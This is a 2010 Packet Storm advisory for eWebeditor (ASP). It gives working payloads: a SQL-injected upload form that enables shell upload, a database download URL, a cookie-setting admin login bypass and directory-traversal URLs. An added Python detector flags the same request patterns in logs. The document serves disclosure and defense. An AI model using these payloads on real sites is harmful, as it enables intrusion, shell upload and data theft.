eWebeditor Traversal / Shell Upload / Bypass / Disclosure

2010-01-31T00:00:00
ID PACKETSTORM:85779
Type packetstorm
Reporter Pouya Daneshmand
Modified 2010-01-31T00:00:00

Description

                                        
`#################################################################  
# Securitylab.ir  
#################################################################  
# Application Info:  
# Name: eWebeditor  
# Version: ASP  
#################################################################  
Vulnerability:  
  
=======================  
Arbitrary File Upload  
=======================  
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">   
<p align="center">   
<input type=file name=uploadfile size=100><br> <br>   
<input type=submit value=Upload>  </p>  
</form>   
  
  
=======================  
Arbitrary File Upload 2  
=======================  
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup   
  
  
=======================  
Database Disclosure  
=======================  
http://site.com/ewebeditor/db/ewebeditor.mdb   
  
  
=======================  
Administrator bypass  
=======================  
http://site.com/eWebEditor/admin/login.asp  
  
Enter this code in place of the URL:  
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));  
  
  
=======================  
Directory Traversal  
=======================  
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..  
  
  
=======================  
Directory Traversal 2  
=======================  
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..  
  
  
#################################################################  
# Discovered By: Pouya Daneshmand  
# Website: http://securitylab.ir  
# Contacts: info[at]securitylab.ir & whh_iran@yahoo.com  
###################################################################  
`
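
A log-review check for the request patterns listed in this advisory, written as an added example that is not part of the original advisory: it flags a quote or `union select` in the `style` parameter of upload.asp, direct requests for db/ewebeditor.mdb, `..` in the `dir` parameter of upload.asp or browse.asp, and the hand-set `adminpass=admin` cookie. The (URL, Cookie header) input shape and the rule names are assumptions, and the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Patterns derived from the advisory's proof-of-concept entries.
SQLI = re.compile(r"'|union\s+select", re.I)
ADMINPASS = re.compile(r"(?:^|;\s*)adminpass=admin\s*(?:;|$)", re.I)


def classify(url, cookie=""):
    """Return the advisory entries matched by one request (URL + Cookie header)."""
    parts = urlsplit(url)
    path = parts.path.lower()
    if "ewebeditor" not in path:
        return []
    # parse_qs percent-decodes values, so %2e%2e and %27 are seen as '..' and "'".
    query = {k.lower(): " ".join(v)
             for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    hits = []
    if path.endswith("/upload.asp") and SQLI.search(query.get("style", "")):
        hits.append("style-sqli")        # "Arbitrary File Upload" entry
    if path.endswith("/db/ewebeditor.mdb"):
        hits.append("db-download")       # "Database Disclosure" entry
    if path.endswith(("/upload.asp", "/browse.asp")) and ".." in query.get("dir", ""):
        hits.append("dir-traversal")     # both "Directory Traversal" entries
    if ADMINPASS.search(cookie):
        hits.append("adminpass-cookie")  # "Administrator bypass" entry
    return hits


def scan(requests):
    """Keep only the requests that match at least one rule."""
    return [(url, hits) for url, cookie in requests if (hits := classify(url, cookie))]


# Constructed sample requests (not captured traffic): (URL, Cookie header).
SAMPLE = [
    ("/manage/ewebeditor/upload.asp?action=save&type=IMAGE"
     "&style=luoye'%20union%20select%20S_ID%20from%20ewebeditor_style", ""),
    ("/ewebeditor/db/ewebeditor.mdb", ""),
    ("/eWebEditor/admin/login.asp", "ASPSESSIONID=abc; adminpass=admin"),
    ("/ewebeditor/asp/browse.asp?style=standard650&dir=./..", ""),
    ("/ewebeditor/asp/browse.asp?style=standard650&dir=images", ""),
]

if __name__ == "__main__":
    for url, hits in scan(SAMPLE):
        print(",".join(hits), url)
```
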